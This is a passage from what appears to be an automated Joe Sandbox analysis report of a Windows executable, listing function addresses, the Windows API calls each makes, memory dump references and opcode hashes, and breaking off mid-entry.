                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Internet$CloseConnectHandleOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1463438336-0
                                                                                                                              • Opcode ID: bbf9e4772127d9db3c384822706a9bd09f80916e8f2a024f46ebb7077a86f08b
                                                                                                                              • Instruction ID: a907809cb61e1cacca0b00b2c3342f7bae75276be1b705da00686d3de6e5248d
                                                                                                                              • Opcode Fuzzy Hash: bbf9e4772127d9db3c384822706a9bd09f80916e8f2a024f46ebb7077a86f08b
                                                                                                                              • Instruction Fuzzy Hash: 90212631244611BFDB159F60DC11FBBBBAAFF68710F10400EFA0687550EB71E810A794
                                                                                                                              Function 001ABC90 Relevance: 6.1, APIs: 4, Instructions: 73processCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001ABCD9
                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 001ABCE0
                                                                                                                              • CloseHandle.KERNEL32(00000004), ref: 001ABCFA
                                                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001ABD29
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2621361867-0
                                                                                                                              • Opcode ID: 8e21ed27e91bb0bcbcc2773096554e2d96cb57c63ced404b333800c782a75b52
                                                                                                                              • Instruction ID: 8b61f4d5df05c2d34d90a71267fd4bdb1a885ba1cd1f8447adf38c34944e14f8
                                                                                                                              • Opcode Fuzzy Hash: 8e21ed27e91bb0bcbcc2773096554e2d96cb57c63ced404b333800c782a75b52
                                                                                                                              • Instruction Fuzzy Hash: 14216F76105249ABDF019FA8ED89FFE7BAAEF06318F044014FA01A6161C776CD61EB60
                                                                                                                              Function 001D8834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 001D88A3
                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001D88BD
                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001D88CB
                                                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001D88D9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2169480361-0
                                                                                                                              • Opcode ID: 41b92074aa24321b63fee27d849ddc602b5129d7649544ee859a1853425affc2
                                                                                                                              • Instruction ID: 41bac00451a9fcfb0adc9be06e4e558f68be9b8f5b55378dc2b58fb13854d0eb
                                                                                                                              • Opcode Fuzzy Hash: 41b92074aa24321b63fee27d849ddc602b5129d7649544ee859a1853425affc2
                                                                                                                              • Instruction Fuzzy Hash: 15118B31245114AFDB14AB28DC19FBA7BAAEF95320F14811AF91AD73E1CB74AC40DB90
                                                                                                                              Function 001C900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 001C906D
                                                                                                                              • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 001C907F
                                                                                                                              • accept.WS2_32(00000000,00000000,00000000), ref: 001C908C
                                                                                                                              • WSAGetLastError.WS2_32(00000000), ref: 001C90A3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLastacceptselect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 385091864-0
                                                                                                                              • Opcode ID: 62ab37edde529daecf2041fc81d101afe7f8effaa05acb338850a0501cccb5c7
                                                                                                                              • Instruction ID: ffcfdb932dcd23fc8d716bf140e9200812d442b865d1a7a902c387283c7b45f5
                                                                                                                              • Opcode Fuzzy Hash: 62ab37edde529daecf2041fc81d101afe7f8effaa05acb338850a0501cccb5c7
                                                                                                                              • Instruction Fuzzy Hash: 652142719001249FC7119F69D885AEEBBFCEF59714F00816AF849D7290DB74DA81CF90
                                                                                                                              Function 001B18E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001B2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,001B18FD,?,?,?,001B26BC,00000000,000000EF,00000119,?,?), ref: 001B2CB9
                                                                                                                                • Part of subcall function 001B2CAA: lstrcpyW.KERNEL32(00000000,?,?,001B18FD,?,?,?,001B26BC,00000000,000000EF,00000119,?,?,00000000), ref: 001B2CDF
                                                                                                                                • Part of subcall function 001B2CAA: lstrcmpiW.KERNEL32(00000000,?,001B18FD,?,?,?,001B26BC,00000000,000000EF,00000119,?,?), ref: 001B2D10
                                                                                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,001B26BC,00000000,000000EF,00000119,?,?,00000000), ref: 001B1916
                                                                                                                              • lstrcpyW.KERNEL32(00000000,?,?,001B26BC,00000000,000000EF,00000119,?,?,00000000), ref: 001B193C
                                                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,001B26BC,00000000,000000EF,00000119,?,?,00000000), ref: 001B1970
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                                                              • String ID: cdecl
                                                                                                                              • API String ID: 4031866154-3896280584
                                                                                                                              • Opcode ID: 11e355158ff79459d94e6447f19751dcc8efb0755bf9e710e1a04ae1db3f98b4
                                                                                                                              • Instruction ID: 3ff18ebb3af50ea1a7df9066fc4c9dc846a82e4c61b634a1d586d9150ac39e69
                                                                                                                              • Opcode Fuzzy Hash: 11e355158ff79459d94e6447f19751dcc8efb0755bf9e710e1a04ae1db3f98b4
                                                                                                                              • Instruction Fuzzy Hash: 2B11D036200342FFDB15AF74D865DBA77B9FF49350B81802AF806CB260EB319951C7A1
                                                                                                                              Function 001A3D46 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _free.LIBCMT ref: 001A3D65
                                                                                                                                • Part of subcall function 001945EC: __FF_MSGBANNER.LIBCMT ref: 00194603
                                                                                                                                • Part of subcall function 001945EC: __NMSG_WRITE.LIBCMT ref: 0019460A
                                                                                                                                • Part of subcall function 001945EC: RtlAllocateHeap.NTDLL(013D0000,00000000,00000001), ref: 0019462F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 614378929-0
                                                                                                                              • Opcode ID: 528e9e2fa4165bcb4b4a3788d8f53ae7fc589eb08950280f219f7599a8461dc8
                                                                                                                              • Instruction ID: 611b752840bda9f77833177189debf8a964dbe59fae3fba8aed24ca540c7153c
                                                                                                                              • Opcode Fuzzy Hash: 528e9e2fa4165bcb4b4a3788d8f53ae7fc589eb08950280f219f7599a8461dc8
                                                                                                                              • Instruction Fuzzy Hash: E411293A800211EBDF353FF0BC447AA3B98BF12360FA14425F9588A591DF30CA80C660
                                                                                                                              Function 001B713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 001B715C
                                                                                                                              • _memset.LIBCMT ref: 001B717D
                                                                                                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 001B71CF
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 001B71D8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1157408455-0
                                                                                                                              • Opcode ID: 0a71f2fb030aafad851ef2a01130e7b7043b4f34f75071e1256f1e4de9f67672
                                                                                                                              • Instruction ID: 22c776995ca42bbfa374f4fca696f1d6bb63b56b6e455ea99510854cc6fcc202
                                                                                                                              • Opcode Fuzzy Hash: 0a71f2fb030aafad851ef2a01130e7b7043b4f34f75071e1256f1e4de9f67672
                                                                                                                              • Instruction Fuzzy Hash: 3011A7719052287AD7205B69AC4DFEBBA7CEF45764F10419AF504E71D0D7744E80CBB4
                                                                                                                              Function 001B13D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 001B13EE
                                                                                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 001B1409
                                                                                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001B141F
                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 001B1474
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3137044355-0
                                                                                                                              • Opcode ID: 1884b33e4de08c84ce8f23a606771f4ff93dc2fd1092153f8fdccd7874f4d7a4
                                                                                                                              • Instruction ID: dac1d96d66dbb229318909665ba376a045342d25d9cea145d7fa8e6123eeef0c
                                                                                                                              • Opcode Fuzzy Hash: 1884b33e4de08c84ce8f23a606771f4ff93dc2fd1092153f8fdccd7874f4d7a4
                                                                                                                              • Instruction Fuzzy Hash: 8B217F71500209FBDB20DF91EC98AEBBBB8EF00744F8184A9EA5297550D774EA44DF51
                                                                                                                              Function 001AC265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 001AC285
                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001AC297
                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001AC2AD
                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001AC2C8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3850602802-0
                                                                                                                              • Opcode ID: 38055dfa841138dbaded538d3611ee5ca06745fa0e22ee221a4b3c19f5479b0d
                                                                                                                              • Instruction ID: ea97e1a63131aa38abd9c187d02c633ef085b627ab553700bfc635be48bb6a91
                                                                                                                              • Opcode Fuzzy Hash: 38055dfa841138dbaded538d3611ee5ca06745fa0e22ee221a4b3c19f5479b0d
                                                                                                                              • Instruction Fuzzy Hash: A711187A940218FFEB11DBD8C885F9DBBB4FB09710F204092EA04B7294D771AE10DB94
                                                                                                                              Function 001B7C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 001B7C6C
                                                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 001B7C9F
                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001B7CB5
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001B7CBC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2880819207-0
                                                                                                                              • Opcode ID: 36e8b87a313de1e779457c4ed2953d64e367eee8e158ee13bdbdb3536edc1bca
                                                                                                                              • Instruction ID: 0720327970780b58555c7795038ef0ce18439db459495242291b3da12769e1a0
                                                                                                                              • Opcode Fuzzy Hash: 36e8b87a313de1e779457c4ed2953d64e367eee8e158ee13bdbdb3536edc1bca
                                                                                                                              • Instruction Fuzzy Hash: A011C872A08244BBD712DF6CAC08AEA7FAE9B44324F14425AF515D3291D7708A54C7A1
                                                                                                                              Function 0018C619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0018C657
                                                                                                                              • GetStockObject.GDI32(00000011), ref: 0018C66B
                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0018C675
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3970641297-0
                                                                                                                              • Opcode ID: d93c74f9160c847ef1cb74b632b74da5660a229600565c3e6b1171976d571c18
                                                                                                                              • Instruction ID: fefb8c8de9611150cfc47d212c07a99e326d3623323991bafcc715a7a0684453
                                                                                                                              • Opcode Fuzzy Hash: d93c74f9160c847ef1cb74b632b74da5660a229600565c3e6b1171976d571c18
                                                                                                                              • Instruction Fuzzy Hash: 211161B2501549BFDB115FA0AC44EFA7B6AEF09364F154225FA0456150E731DD60DFA0
                                                                                                                              Function 001B49D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 001B49EE
                                                                                                                              • Sleep.KERNEL32(00000000), ref: 001B4A13
                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 001B4A1D
                                                                                                                              • Sleep.KERNEL32(?), ref: 001B4A50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2875609808-0
                                                                                                                              • Opcode ID: 6a7f2f44e3dfa1e0f2c5565c505da9c7ba60c234eb7f75a261b437aa01891247
                                                                                                                              • Instruction ID: fe460b1ae879b523dda01258ccabb47bd9ae0c5016dc5e2bfe9e481e68c664ed
                                                                                                                              • Opcode Fuzzy Hash: 6a7f2f44e3dfa1e0f2c5565c505da9c7ba60c234eb7f75a261b437aa01891247
                                                                                                                              • Instruction Fuzzy Hash: 41112A31D44518DBCF04AFA5E949AFEBB75FF09751F018055E942B3241CB3095A0CB99
                                                                                                                              Function 001A5BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3016257755-0
                                                                                                                              • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                              • Instruction ID: 98249eaa636489f9ca9f8bf23487d60e480fd5f4e3abd4aaf28513148c9a2c1b
                                                                                                                              • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                              • Instruction Fuzzy Hash: CF014E7A00464EBBCF165E84DC41CEE3F67BB1A360B598415FA1859035D336CAB1AB81
                                                                                                                              Function 001980E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0019869D: __getptd_noexit.LIBCMT ref: 0019869E
                                                                                                                              • __lock.LIBCMT ref: 0019811F
